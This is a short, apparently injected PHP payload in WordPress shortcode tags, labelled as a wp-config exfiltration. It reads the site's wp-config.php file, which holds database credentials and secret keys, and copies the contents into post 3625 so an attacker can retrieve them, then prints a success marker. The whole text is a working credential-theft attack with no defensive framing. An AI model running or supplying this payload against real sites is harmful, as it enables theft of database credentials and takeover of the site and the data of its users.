WP_CONFIG_EXFIL_178035
[php]require(“/var/www/html/business/wp-load.php”);global $wpdb;$c=file_get_contents(“/var/www/html/business/wp-config.php”) or $c=”FAILED”;$wpdb->update($wpdb->posts,[“post_content”=>substr($c,0,65000)],[“ID”=>3625]);echo “WROTE_TO_3625_178035
“;[/php]